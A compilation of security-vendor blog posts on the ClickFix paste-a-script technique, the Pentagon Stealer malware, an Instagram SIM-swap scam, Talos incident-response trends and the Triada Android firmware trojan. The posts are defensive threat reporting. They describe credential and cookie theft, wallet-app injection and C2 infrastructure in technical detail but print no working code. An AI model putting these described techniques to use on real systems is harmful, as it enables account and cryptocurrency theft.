From the near-demise of MITRE’s CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity
WeLiveSecurity – Read More
Attackers are increasingly using the ClickFix technique to infect Windows computers to force users to run malicious scripts manually. The use of this tactic was first seen in the spring of 2024. Since then, attackers have come up with a number of scenarios for its use.
The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques. Under one pretext or another, attackers convince the user to copy a long command line (in the vast majority of cases — a PowerShell script), paste it into the system’s Run window, and press Enter, which should ultimately lead to compromising the system.
The attack normally begins with a pop-up window simulating a notification about a technical problem. To fix this problem, the user needs to perform a few simple steps, which boil down to copying some object and executing it through the Run application. However, in Windows 11, PowerShell can also be executed from the search bar for applications, settings, and documents, which opens when you click on the icon with the system’s logo, so sometimes the victim is asked to copy something there.
ClickFix attack – how to infect your own computer with malware in three easy steps. Source
This technique earned itself the name ClickFix because usually the notification contains a button, the name of which is somehow related to the verb “to fix” (Fix, How to fix, Fix it…), which the user needs to click to solve the alleged problem or see instructions for solving it. However, this isn’t a mandatory element — the need to launch some code can be justified by the requirement to check the computer’s security, or, for example, to confirm that the user is not a robot. In this case, the Fix button can be omitted.
An example of instructions for confirming that you’re not a robot. Source
The scheme may differ slightly from case to case, but attackers typically give the victim the following instructions:
So what actually happens? The first action (clicking the button to copy the code that solves the problem) copies some script invisible to the user to the clipboard. The second (pressing the key combination [Win] + [R]) opens the Run window, which in Windows is designed to quickly launch programs, open files and folders, and enter commands. In the third (pressing the combination [Ctrl] + [V]), the PowerShell script is pasted into Run window from the clipboard. And finally, with the fourth action (pressing [Enter]), the code is launched with the current user privileges.
As a result of executing the script, malware is downloaded and installed onto the computer — with the specific malicious payload varying from campaign to campaign. Thus, what we get is the user running a malicious script on their own system thereby infecting his own computer.
Sometimes attackers create their own websites and lure users to them using various tricks. Or they hack existing websites and force them to display a pop-up window with instructions. In other cases similar instructions are delivered under various pretexts via email, social networks, or even through instant-messengers. Here are some typical scenarios of using this technique in attacks:
A classic scenario in which the visitor doesn’t see the page they expected to and is told they need to install a browser update to display it.
Another standard tactic: the user isn’t allowed to view a certain document in Microsoft Word or PDF format. Instead, they’re shown a notification asking to install a plugin for viewing the PDF or “Word online”.
In this case attackers substitute the file format. The victim sees a .pdf or .docx icon, but in reality clicks on the HTML file that opens in the browser. Then everything is similar to the previous case — what are needed are: a plugin, malicious instructions, and the familiar “How to fix” button.
A more unusual variation of the ClickFix tactic is used on fake Google Meet or Zoom websites. The user receives a link for a video call, but “is not allowed to join” it, because there are problems with their microphone and camera. The message “explains” how to fix it.
Finally, the most curious version of the attack using ClickFix: the site visitor is asked to complete a fake CAPTCHA to prove they’re not a robot. But the required proof is, of course, is to follow the instructions written in the pop-up window.
Prove you’re not a robot – to do this, run a malicious script on your computer. Source
The simplest mechanism for protecting your company from attacks using the ClickFix technique involves blocking the [Win] + [R] key combination in the system — it’s hardly needed at all in the day-to-day work of the typical employee. However, this isn’t a panacea — as we already wrote above, in Windows 11 the script can be launched from the search bar, and some variations of this attack use more detailed instructions in which the user is told how to manually open the Run window.
Therefore, protective measures, of course, should be comprehensive and primarily aimed at training employees. It’s worth conveying to them that if someone seeks any manual manipulations with the system — it’s an extremely alarming sign.
Here are some tips on how to protect your organization’s employees from attacks using ClickFix tactics:
Kaspersky official blog – Read More
The current article provides technical analysis of an emerging malware named Pentagon Stealer. The research has been prepared by the analyst team at ANY.RUN.
In early March of this year, when browsing Public submissions, the ANY.RUN team came across an interesting malware sample written in Golang.
View sandbox analysis of the sample
The malicious program exhibited unusual behavior, first terminating and then restarting processes of popular web browsers (Image 1).
The malware also engaged in data theft, which was flagged by ANY.RUN’s Interactive Sandbox.
To collect more context about this malware, we used Threat Intelligence Lookup (Image 3) with queries like the following one:
domainName:”pentagon.cy” OR domainName:”stealer.cy”
Among the search results, we identified a sandbox analysis of a website hosted on the domain pentagon.cy that featured the admin panel of this malware. Thus, we named it Pentagon Stealer.
Exploring the website further, we discovered that there was also a Python-based version of this malicious program, available at pentagon[.]cy/paste?userid=<n>. You can see the page in this sandbox session.
Considering the lack of public information on the malware and its potential to pose serious threat to our clients, we decided to analyze it and collect essential intel for effective detection of Pentagon Stealer.
Here’s what we’ve found.
Let’s start with the Python variant which still can be found on the attackers’ infrastructure to this day. Next, we’ll compare its functionality to that of the previous versions.
As seen in the sandbox analysis, the attack begins with a script dropper. Its purpose is to launch python_setup.py encrypted via Fernet using AES in CBC mode.
Use this decryption recipe in CyberChef for decrypting the initial and all the following stages, as the algorithm remains unchanged, only the key changes.
Once we decrypt the payload, we can see the code of the stealer’s main module.
First, it checks whether the directory “%LOCALAPPDATA%/HD Realtek Audio Player” exists on the victim’s computer. If not, it creates it and continues execution. This is a technique used by the malware to check if the machine has already been infected.
The malware then begins to steal a variety of data, including:
There are also two actions performed by the malware that stand out from the rest and are worth a more detailed analysis:
Let’s take a closer look at them.
The stealer can inject into two popular cryptocurrency wallet management applications: Atomic and Exodus. Both use Electron, which stores JavaScript code in app.asar files.
The injection performed by Pentagon involves replacing these files with attacker-patched versions.
The image above shows the stealer overwriting the app.asar content of both applications with data from its command server. Additionally, a loguuid is written to the LICENSE files in both cases, which allows the attackers to identify the victim.
But why did they overwrite app.asar and what specific changes were made?
Since .asar files are archives containing .js files, we can unpack them with 7-Zip with a special plugin to analyze the code. As expected, the goal here is to obtain the user’s mnemonic and password. The images below illustrate how this is done.
The images show how a packet, containing the user’s password, mnemonic, and wallet type, is formed. One of the headers includes the loguuid.
It’s worth noting that the attacker clearly used Inject_PoC in this part of the operation, as indicated by the code similarity.
For example, the Atomic Wallet section from the PoC repository looks like this:
The similarity is evident. The attacker just simplified the packet. In the case of Atomic, even the application version matches.
For Exodus, the code segment from the repository looks like this:
This is a common technique for obtaining cookies in unencrypted form.
In short, this method causes some Chromium-based browsers to provide cookies in plaintext. If the standard method of extracting cookies from files were used, they would need to be decrypted, which can be problematic.
These browsers use the DPAPI mechanism to protect sensitive data. If the malware is executed in the session of a user whose password was used in the encryption process, a call to the UnProtect() function may be enough to decrypt the data. Otherwise, decryption can be extremely difficult. In addition, the task may be complicated, for example, by the Application-Bound (App-Bound) Encryption method used in the latest versions of Chrome.
Here’s how debugging helps to get cookies in an easier way:
This method explains the unusual behavior of relaunching browser, which piqued our interest when we first came across Pentagon’s sample.
The final part of the stealer module is the decryption and launch of the next stage, runpython.py.
Once we decrypt the payload, we can see the command used.
Following the URL inside the command reveals the dropper script used for launching runpython.py.
Inside runpython.py, we can see the following bat-file:
It follows this algorithm:
In all samples we have analyzed (example), Pentagon Stealer exclusively dropped Purecrypter which then deployed a miner. However, it is possible that there can be alternative payloads.
Pentagon Stealer’s chain of attack can be represented in the following way:
Let’s now take a look at Pentagon’s development timeline and see what methods the attackers used for delivering it to victims.
One of the earliest campaigns we came across in our research involved masking Pentagon as popular PyPI Python packages using a technique called “typosquatting”.
In this version, the malware couldn’t steal Web Data from Chromium browsers, unencrypted cookies via browser debugging, or Telegram data. Additionally, the protocol for interacting with the C2 server was more primitive: all information was written to files, which were then sent to funcaptcha[.]ru/delivery.
In another campaign, the stealer was available under the name 1312 Stealer. ANY.RUN’s Public submissions help us track changes in the admin panel.
On September 2 2024, it appeared as follows:
By September 23, it looked like this:
A Telegram account is listed for contact, previously seen in Pentagon Stealer Admin Panel.
This campaign used two domains: 1312services[.]ru and 1312stealing[.]ru.
The code for this version can be viewed here.
1312’s new functionality included stealing Web Data from Chromium-based browsers and Telegram tdata. Communication with the C2 server changed: passwords were sent to 1312services[.]ru/pw, Web Data to 1312services[.]ru/webdata, and everything else to 1312services[.]ru/delivery.
There are also versions of 1312 Stealer, which include Acab Stealer and Vilsa Stealer.
Now, it’s time to dissect the latest version of the stealer, which is currently being actively distributed. It kept the functionality of the Python version, but with some improvements described below.
View sandbox analysis of the Golang version
Unlike its Python counterpart, this variant does not download subsequent stages independently. Instead, it is used as one of the modules in the attack chain, as shown by sandbox analysis. Learn more about this in the ‘Infection Methods’ section.
Upon launch, the stealer hides its console window and checks for the directory %LOCALAPPDATA%Realtek HD Audio Service on the victim’s computer, indicating previous execution.
It then begins collecting information as described. The main improvement, unique to the Golang version, is the ability to steal data not only from Firefox but also from other Gecko-based browsers, including:
The malware now can steal passwords from these browsers, in addition to cookies. The rest of the functionality remains unchanged, though the programming language has been altered.
Regarding interaction with the C2 server, recent malware versions use two domains: stealer[.]cy and pentagon[.]cy. The communication method is identical in both the latest Python and Golang versions.
The stealer and command server communicate via HTTP requests. Upon log creation (create_log()), the victim sends the number of collected passwords, cookies, Discord tokens, and names of all collected files. The server responds with either a rejection or a log_uuid, which is subsequently used as the victim’s identifier, replacing the previously hardcoded uuid.
Notably, the Golang version of the stealer lacks any encryption of its code and strings, which is unusual since each subsequent stage of its Python counterpart is encrypted using AES. This suggests the possible existence of a dropper or loader.
A search in TI Lookup involving the stealer yielded the following analysis.
Here is the sample’s execution chain:
The initial attack stage involved running an NSIS installer named BlumBot.exe. This installer executed a VBS script that displayed a familiar message, “vcruntime140.dll is missing from your computer”. It then proceeds to launch the next stage, Installer.exe.
Notably, reverse-engineering BlumBot.exe was not necessary to uncover this. A tool capable of unpacking NSIS installers and extracting the .nsi script was enough. In our investigation, we used NanaZip.
NSIS installer in NanaZip:
Fragment of the .nsi script:
Installer.exe is a loader written in Golang. Its sole purpose is to download and execute two files, ByPass.exe and Main.exe, from biteblob[.]com, and then send a Telegram message confirming successful execution.
Following this, the stealer and a second module, which is actually a miner, are executed.
This is just one example of how Pentagon Stealer is used. In Public Submissions, you can frequently observe samples of various malware using this stealer as one stage in an attack chain.
As mentioned, this malware has appeared under various names, although its core functionality remains unchanged, with only minor logical modifications. This trend continues today.
For instance, we recently discovered samples of a stealer with identical code but named BLX Stealer, as indicated by code strings and description in this article.
View sandbox analysis of BLX Stealer
The attack consists of multiple stages, but we focus on the stealer itself.
This version is written in Python, like its predecessors, but is packaged into an executable using PyInstaller. With pyinstxtractor and pylingual.io, we successfully reconstructed the stealer’s source code for analysis.
Regarding functionality, this version did not branch out from the latest Pentagon Stealer, as it lacks crypto-wallet injection and data theft from Gecko-based browsers other than Mozilla Firefox.
Yet, it has unique features not previously observed:
The communication protocol with the C2 server is also noteworthy. The stealer does not send files directly; instead, it uploads them to gofile.io and then sends the access link to http[:]//<ip>/tgproxy/{USERID}/.
We also discovered a sample with the capability to steal NordVPN configuration files (user.config).
Pentagon Stealer cannot be considered malware capable of complex targeted attacks due to its simplicity. Its development history shows that authors often merely changed the domain, leaving the functionality intact. However, a year has passed since its first mention, and it has undergone modifications, with the most significant changes occurring this year. The story is far from over, as new, more complex versions continue to emerge, albeit from different authors.
| Tactics | Techniques | Description |
|---|---|---|
| TA0002: Execution | ||
| T1059.001: Command and Scripting Interpreter: PowerShell | Disables disk C: scanning using Microsoft Defender in the Python version | |
| T1059.003: Command and Scripting Interpreter: Windows Command Shell | Executes a .bat file to download the next stage in the Python version | |
| T1059.005: Command and Scripting Interpreter: Visual Basic | Launches a .vbs script to escalate privileges in the Python version | |
| TA005: Defense Evasion | ||
| T1140: Deobfuscate/Decode Files or Information | Decrypts Python stages using Fernet | |
| TA0006: Credential Access | ||
| T1555.003: Credentials from Web Browsers | Steals passwords from various browsers | |
| T1539: Steal Web Session Cookie | Steals cookies from various browsers | |
| TA0009: Collection | ||
| T1005: Data from Local System | Collects files with specific names and extensions from user directories | |
| TA0011: Command and Control | ||
| T1071.001: Application Layer Protocol | Sends collected data to the command server | |
| T1659: Content Injection | Injects custom JavaScript code into cryptocurrency management software | |
| TA0040: Impact | ||
| T1657: Financial Theft | Steals credentials from cryptocurrency management software |
| Title | Description |
|---|---|
| Name | build_59.exe |
| MD5 | a1726ff80b020aa291bdcbb21159c618 |
| SHA1 | 51c9978e60995174ed2b6b8cc5e8e1a973b66337 |
| SHA256 | 0411589551ab684892e3cc776674df0f07bcdbb931c29da93c2afd08fe077336 |
DNS requests
HTTP/HTTPS requests
The post Pentagon Stealer: Go and Python Malware with Crypto Theft Capabilities appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
2024 wasn’t the year that AI rewrote the cybercrime playbook — but it did turbocharge some of the old tricks. In Cisco Talos’ 2024 Year in Review, with the help of our friends at Robust Intelligence (now a Cisco company), we dissect how cybercriminals used generative AI to scale up social engineering, fine-tune phishing, and automate grunt work like OSINT gathering.
So while AI didn’t completely rock the threat landscape last year, the groundwork is being laid for 2025, where agentic AI and automated vulnerability hunting could cause some significant challenges for defenders. Our research showcases the top four areas of concern for the coming year.
Curious about how AI could impact your defenses — or your data — this year? Take a look at this summary of AI-based threats:
Need a 60 second summary? Take a look at this video:
Download Talos’ 2024 Year in Review.
Also check out Cisco’s State of AI Security report.
Cisco Talos Blog – Read More
“I’m giving away $125 000! Join the project via the link in my profile!” — suddenly, a popular Russian blogger launches a massive cash giveaway on Instagram. A familiar face, speaking in upbeat voice and confident tone, appears in Stories. It all looks too good to be true…
That’s because it is. There’s no real project. The blogger didn’t launch anything. Her account was simply hijacked. And the scammers went beyond the usual tricks: not only did they steal access and post a fake giveaway link, but they also stitched together a new video from old footage and dubbed it with a voice generated by neural networks. Read the whole story to learn how Instagram accounts are stolen by swapping SIM cards — and what you can do to protect yourself.
With the rise of AI tools, scammers have suddenly gotten “smarter”. Before, having hacked a blogger, they’d have just posted phishing links and hoped the audience would bite. Now they can run full-fledged PR campaigns from the stolen account. Here’s what the scammers did this time:
All this lends the fake project an air of legitimacy — since bloggers often use content like this across different formats to promote real initiatives. The scammers spared no effort — even throwing in some testimonials from grateful fans; fake ones, of course.
Fake testimonials aimed at encouraging more fans to participate
Let’s take a closer look at the video. At first glance, it’s surprisingly high-quality. It follows all the blog’s rules: the blog’s topic (home renovation), voiceover narration, quick editing. But upon closer examination, the illusion is shattered. Check out the screenshot below: only one video has a watermark in the top-left corner — from the free version of the editing app CapCut. That’s the fake. The other videos don’t have this watermark — because the real blogger either uses the premium version or edits with another app.
The first video is the fake one created by the scammers
There’s another detail: the subtitles. In all her real videos, the blogger uses plain white text with no background. In the fake video, the text is white on a black background. Sure, bloggers sometimes change their style, but usually settings like font and color are saved in their editing software and stay consistent.
Here’s where it gets interesting. What kind of “project” exactly were the scammers promoting, and what happens if you click the link?
The bio looks suspicious
If you’re using a device without reliable protection (which would warn you if you try to visit a phishing site), you’ll land on a very basic page: a flashy image, some eye-catching text, and a Claim your prize button. Clicking such buttons typically leads to one of two outcomes: you’ll be asked to pay a commission, or prompted to enter your data — purportedly to receive your winnings. In any case, you’ll be asked to share your bank details. Of course, no prize is coming — it’s pure phishing.
A girl with dollars and a smartphone symbolizes the riches that await… the scammers after they steal your banking account
Important: there’s no official version of how the account was compromised yet. It’s a high-profile case, and the blogger has reported it to the police. She currently suspects she fell victim to a SIM-swap attack. In short, this means that the scammers convinced her mobile provider to transfer her phone number to a new SIM card. There are two main ways this can be done:
SIM swapping allowed scammers to bypass two-factor authentication and convince Instagram support that they were the real account owners. Similar tricks can be used with any service that sends verification codes via text — including online banks.
As for the blogger’s original SIM card, it instantly turned into a useless piece of plastic: no internet, no calls, no texts.
Here are the basic rules to prevent most types of account hacks — whether on messaging apps, social networks, forums, or other sites:
More to read on protecting your accounts from hacking:
Kaspersky official blog – Read More
Phishing attacks spiked this quarter as threat actors leveraged this method of initial access in half of all engagements, a vast increase from previous quarters. Conversely, the use of valid accounts for initial access was rarely seen this quarter, despite being the top observed method in 2024, according to our Year in Review report. Nevertheless, valid accounts played a prominent role in the attack chains Cisco Talos Incident Response (Talos IR) observed as actors predominately used phishing to gain access to a user account, then leveraged this access to establish persistence in targeted networks.
Ransomware and pre-ransomware incidents made up a slightly larger portion of threats observed this quarter, with most incidents falling into the latter category. Talos IR’s investigations into pre-ransomware events provided unique insight into defensive measures that successfully stopped these attacks before a ransomware executable could be deployed, including early engagement with the incident response team and robust monitoring of certain threat actor tactics, techniques and procedures (TTPs).
Watch a discussion on the biggest trends on this latest report
Threat actors used phishing to achieve initial access in 50 percent of engagements, a notable increase from less than 10 percent last quarter. Vishing was the most common type of phishing attack seen, accounting for over 60 percent of all phishing engagements, though we also observed malicious attachment, malicious link and business email compromise (BEC) attacks.
Adversaries predominately leveraged phishing to gain access to a valid account, pivot deeper into the targeted network, and expand their foothold, contrasting other phishing objectives we have seen in the past such as eliciting sensitive information or monetary transfers. For example, in an observed vishing campaign — described in further detail in the ransomware section below — adversaries deceived users over the phone into establishing remote access sessions to the user’s workstation, then used this access to load tooling, establish persistence mechanisms and disable endpoint protections.
In some engagements, actors leveraged phishing attacks to steal users’ legitimate access tokens, enabling them to maintain persistent access to the targeted networks. In one engagement, adversaries deployed a phishing email with a malicious link to successfully steal a user’s multi-factor authentication (MFA) session token along with their credentials. From there, the actors gained unauthorized access to the target’s Microsoft Office 365 environment and deployed enterprise applications with the likely goal of gaining further access into additional accounts. In another phishing engagement, upon gaining access to a user’s valid account, the actors cloned their active access token and specified new credentials for outbound connections. They then sought to expand their access by running commands to gather system information and creating a scheduled task to execute a malicious JavaScript file upon user login.
Ransomware and pre-ransomware incidents made up over 50 percent of engagements this quarter, an increase from nearly 30 last quarter. A robust campaign leveraging BlackBasta and Cactus TTPs that targeted manufacturing and construction organizations accounted for over 60 percent of pre-ransomware and ransomware engagements and was consistent with public reporting on likely related incidents.
The attack chain we observed begins with the threat actors flooding users’ mailboxes at targeted organizations with a large volume of benign spam emails. After a few days, the actors call the victim, usually via Microsoft Teams, and direct them to initiate a Microsoft Quick Assist remote access session, helping them with installation of the program if not already present on the user’s system. Once a Quick Assist session is established, the adversary loads tooling to collect information about the target system and establish persistence. The actors create the TitanPlus registry key and embed IP addresses to enable command and control (C2) communication, using character substitution to obfuscate the infrastructure. After completing the TitanPlus registry key persistence process, the adversary then performs subsequent privilege escalation and lateral movement, seemingly with the ultimate goal of deploying ransomware. We initially observed the threat actors leveraging BlackBasta ransomware and pivoting to Cactus ransomware after public reporting on their use of the former was released. Our analysis of engagements involving Cactus led us to identify a previously undocumented variant of the ransomware, which builds upon previous functionality with new command-line arguments that provide the threat actors with greater control over the binary’s function, likely to prioritize efficiency and maximum impact.
Looking forward: The threat actors responsible for this campaign have proven to be agile, modifying their TTPs as more public reporting on this campaign emerges, which leads us to assess they will continue to adjust their TTPs and/or incorporate a different ransomware family or tooling into their attack chain moving forward to evade detection. We published our findings on this campaign in our Year in Review report in late March 2025 and will be tracking this activity to see if the threat actors modify their operations moving forward.
Out of all ransomware and pre-ransomware engagements this quarter, 75 percent of incidents fell into the latter category, providing insight into defensive measures that successfully stopped these attacks before a ransomware executable could be deployed.
One tactic that proved effective was early engagement with the incident response team. For example, in one engagement, Talos IR was contacted directly after the organization’s users experienced a flood of spam email. Given this TTP was consistent with the vishing campaign we had already observed affecting other organizations, we were able to advise that this was very likely pre-ransomware activity and share actionable indicators of compromise (IOCs) and mitigation recommendations.
Another defensive measure that was effective in containing pre-ransomware activity was robust monitoring and endpoint detection and response (EDR) solutions, particularly those configured to alert on unauthorized remote access connections and suspicious file execution. In one engagement, Cisco XDR was configured to flag certain TTPs that the security team identified were consistent with pre-ransomware activity, and soon after the alerts were triggered, they moved quickly to focus on eradication of the threat. The TTPs included use of remote access tools, disabling of the volume shadow copy service (VSS), and use of a local account to deploy a vulnerable driver. In another engagement, the organization’s monitoring tools alerted them of unauthorized remote access and they acted swiftly to respond to the affected system, resulting in the threat actor only having access to the targeted system for three minutes. In a different incident, suspicious file execution was flagged, leading the customer to identify the threat and isolate the system within hours of initial access.
Crytox appeared in a Talos IR engagement for the first time this quarter, with affiliates leveraging HRSword as part of their attack chain — a tool that has not previously been publicly associated with the ransomware group. According to public reporting, Crytox is a ransomware family first seen in 2020 that typically encrypts local disks and network drives and drops a ransom note with a five-day ultimatum. Affiliates are known to leverage the uTox messenger application so victims can communicate with the threat actors.
Talos IR responded to an engagement in which adversaries exploited a public-facing application that was not protected by MFA to gain initial access, then launched a ransomware attack that encrypted two hypervisors hosting numerous VM servers. The actors used TTPs that aligned with known Crytox TTPs, including using uTox for communication and dropping a ransomware note that matches publicly shared Crytox ransom notes. Of note, we also observed the affiliates using HRSword to disable the target’s EDR solution. We first reported on ransomware actors’ use of HRSword in FY24 Q1, specifically highlighting a Phobos incident, and observed additional threat groups leverage the tool throughout the remainder of the year.
The manufacturing industry vertical was the most affected this quarter, accounting for 25 percent of engagements. Notably, though education was the most targeted vertical for the second half of 2024, we did not respond to any incidents targeting education entities this quarter.
As mentioned, the most observed means of gaining initial access this quarter was phishing, followed by use of valid accounts and exploitation of public facing applications. The increase in phishing attacks this quarter is likely due in part to the robust vishing campaign we observed that accounted for over 60 percent of all phishing engagements.
Half of the engagements this quarter involved MFA issues, including misconfigured MFA, lack of MFA and MFA bypass. As mentioned in the above ransomware section, token theft played a role in several incidents this quarter, enabling threat actors to bypass authentication controls and establish trusted connections. We also observed threat actors adding malicious secondary MFA devices to compromised accounts as well as taking advantage of a lack of MFA on remote access services, the latter of which is a tactic we have consistently observed in previous quarters. Talos IR recommends monitoring and alerting on the following for effective MFA deployment: abuse of bypass codes, creation of accounts designed to bypass or be exempt from MFA and removal of accounts from MFA.
Half of the engagements this quarter involved social engineering, potentially highlighting insufficient user education. This security weakness corresponds with the surge in phishing attacks, as users were manipulated to grant attackers access to their environments, with vishing proving to be particularly effective. Talos IR recommends raising awareness of phishing and social engineering techniques, as user education is a key part of spotting phishing attempts, countering MFA bypass techniques and knowing where to report suspicious activity.
Almost 20 percent of incidents involved organizations that did not have protections in place to prevent uninstallation of EDR solutions, enabling actors to disable these defenses. Talos IR strongly recommends ensuring endpoint solutions are protected with an agent or connector password and customizing their configurations beyond the default settings. Additional recommendations for hardening EDR solutions against this threat can be found in our 2024 Year in Review report.
The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagement. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
|
Tactic |
Technique |
Example |
|
Reconnaissance (TA0043) |
T1590 Gather Victim Network Information |
Adversaries may gather information about the victim’s networks that can be used during targeting. Information may include a variety of details, including administrative data as well as specifics regarding its topology and operations. |
|
|
T1595.002 Active Scanning: Vulnerability Scanning |
Adversaries may run vulnerability scans against an organization’s public-facing infrastructure to identify potential vulnerabilities to exploit. |
|
Initial Access (TA0001) |
T1598.004 Phishing for Information: Spearphishing Voice |
In an observed campaign, users received calls from the adversary posing as IT support and were prompted to initiate a QuickAssist session. |
|
|
T1598.003 Phishing for Information: Spearphishing Link |
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. |
|
|
T1598 Phishing for Information: Spearphishing Attachment |
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. |
|
|
T1190 Exploit in Public-Facing Application |
Adversaries may exploit a vulnerability to gain access to a target system. |
|
|
T1078 Valid Accounts |
Adversaries may use compromised credentials to access valid accounts during their attack. |
|
Execution (TA0002) |
T1059.001 Command and Scripting Interpreter: PowerShell |
Adversaries may abuse PowerShell to execute commands or scripts throughout their attack. |
|
|
T1047 Windows Management Instrumentation |
Adversaries may use Windows Management Instrumentation (WMI) to execute malicious commands during the attack. |
|
|
T1053 Scheduled Task/Job |
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. |
|
Persistence (TA0003) |
T1098 Account Manipulation |
Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. |
|
|
T1136.001 Create Account: Local Account |
Adversaries may create a local account to maintain access to victim systems. |
|
|
T1547.001 Persistence: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Adversaries established persistence by embedding IP addresses in the TitanPlus registry key. |
|
|
T1133 External Remote Services |
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. |
|
|
T1546.008 Event Triggered Execution: Accessibility Features |
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. |
|
Privilege Escalation (TA0004) |
T1134 Access Token Manipulation |
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. |
|
Defense Evasion (TA0005) |
T1562.001 Impair Defenses: Disable or Modify Tools |
Adversaries may disable or uninstall security tools to evade detection. |
|
|
T1562.004 Impair Defenses: Disable or Modify System Firewall |
Adversaries may disable or modify system firewalls to bypass controls limiting network usage. |
|
|
T1564.008 Hide Artifacts: Email Hiding Rules |
Adversaries may use email rules to hide inbound or outbound emails in a compromised user’s mailbox. |
|
|
T1070.001 Indicator Removal: Clear Windows Event Logs |
Adversaries may clear the Windows event logs to cover their tracks and impair forensic analysis. |
|
|
T1112 Modify Registry |
Adversary used some registry modifications to get privilege escalation. |
|
Credential Access (TA0006) |
T1003 OS Credential Dumping |
Adversaries may dump credentials from various sources to enable lateral movement. |
|
|
T1528 Steal Application Access Token |
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. |
|
Discovery (TA0007) |
T1046 Network Service Discovery |
Adversaries may use tools like Advanced Port Scanner for network scanning. |
|
|
T1057 Process Discovery |
Adversaries may attempt to get information about running processes on a system. |
|
|
T1018 Remote System Discovery |
Adversaries may attempt to discover information about remote systems with commands, such as “net view”. |
|
|
T1082 System Information Discovery |
An adversary may attempt to get detailed information about the operating system and hardware. |
|
|
T1016 System Network Configuration Discovery |
Adversaries may use commands, such as ifconfig and net use, to identify network connections. |
|
|
T1087.001 Account Discovery: Local Account |
Enumerate user accounts on the system. |
|
Lateral Movement (TA0008) |
T1021.001 Remote Services: Remote Desktop Protocol |
Adversaries may abuse valid accounts using RDP to move laterally in a target environment. |
|
|
T1021.006 Remote Services: Windows Remote Management |
Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). |
|
Command and Control (TA0011) |
T1219 Remote Access Software |
An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. |
|
|
T1105 Ingress Tool Transfer |
Adversaries may transfer tools from an external system to a compromised system. |
|
|
T1572 Protocol Tunneling |
Adversaries may tunnel network communications to and from a victim system within a separate protocol, such as SMB, to avoid detection and/or enable access. |
|
Exfiltration (TA0010) |
T1048 Exfiltration Over Alternative Protocol |
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel, such as WinSCP. |
|
Impact (TA0040) |
T1486 Data Encrypted for Impact |
Adversaries may use ransomware to encrypt data on a target system. |
|
|
T1490 Inhibit System Recovery |
Adversaries may disable system recovery features, such as volume shadow copies. |
|
|
T1489 Service Stop |
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. |
|
Software/Tool |
S0029 PsExec |
Free Microsoft tool that can remotely execute programs on a target system. |
|
|
S0349 LaZagne |
A post-exploitation, open-source tool used to recover stored passwords on a system. |
|
|
S0357 Impacket |
An open-source collection of modules written in Python for programmatically constructing and manipulating network protocols. |
|
|
S0002 Mimikatz |
Credential dumper that can obtain plaintext Windows logins and passwords. |
|
|
S0097 Ping |
An operating system utility commonly used to troubleshoot and verify network connections. |
|
|
S0552 AdFind |
Freely available command-line query tool used for gathering information from Active Directory. |
|
|
S1071 Rubeus |
A C# toolset designed for raw Kerberos interaction. |
|
|
S0057 Tasklist |
A utility that displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. |
Cisco Talos Blog – Read More
Look out for AI-generated ‘TikDocs’ who exploit the public’s trust in the medical profession to drive sales of sketchy supplements
WeLiveSecurity – Read More
The familiar checkout ritual at the supermarket: once everything’s been scanned — the offer, delivered with a hopeful smile: “Chocolate bar for the road? It’s a good one, and the discount is almost criminal”. If you’re lucky, you get a delicious bonus at a great price. But more often than not they’re trying to sell you something that’s not selling well: either it’s about to expire or it has some other hidden flaw.
Now, imagine you declined that chocolate bar, but it was secretly slipped into your bag anyway, or even worse, into your pocket, where it melted and ruined your clothes, spoiling your day. Well, something similar happened to those who bought knock-offs of popular smartphone brands from online marketplaces. No, they didn’t get a chocolate bar. They walked away with a brand-new smartphone that had the Triada Trojan embedded in its firmware. This is much worse than melted chocolate. Their crypto balances, along with their Telegram, WhatsApp, and social media accounts, could be gone before they could utter “bargain!”. Someone could steal their text messages and a lot more.
That’s the name we at Kaspersky gave to the Trojan we first discovered and described in detail in 2016. This mobile malware would infiltrate almost every process running on a device, while residing only in the RAM.
The emergence of Triada spelled a new era in the evolution of mobile threats targeting Android. Before Triada, Trojans were relatively harmless — mainly displaying ads and downloading other Trojans. This new threat showed that things would never be the same again.
With time, Android developers fixed the vulnerabilities that early versions of Triada exploited. Recent Android versions restricted even users with root privileges from editing system partitions. Did this stop the cybercriminals? What do you think?!..
Fast-forward to March 2025, and we discovered an adapted version of Triada that takes advantage of the new restrictions. The threat actor infects the firmware even before the smartphones are sold. Pre-installed in system partitions, the malware proves nearly impossible to remove.
Our Android security solution detects the new version of Triada as Backdoor.AndroidOS.Triada.z. This new version is what’s embedded in the firmware of fake Android smartphones available from online marketplaces. It can attack any application running on the device. This gives the Trojan virtually unlimited capabilities. It can control text messages and calls, steal crypto, download and run other applications, replace links in browsers, surreptitiously send messages in chat apps on your behalf, and hijack social media accounts.
A copy of Triada infiltrates every app launched on an infected device. Besides that, the Trojan includes specialized modules that target popular apps. As soon as the user downloads a legitimate app like Telegram or TikTok, the Trojan embeds itself in it and starts causing harm.
Telegram. Triada downloads two modules to compromise Telegram. The first one initiates malicious activity once a day, connecting to a command-and-control (C2) server. It sends the victim’s phone number to the criminals, along with complete authentication data — including the access token. The second module filters all messages, interacting with a bot (which didn’t exist at the time of our research), and deleting notifications about new Telegram logins.
Instagram. Once a day, the Trojan runs a malicious task to search for active session cookies and forward the data to the attackers. These files help the criminals assume full control over the account.
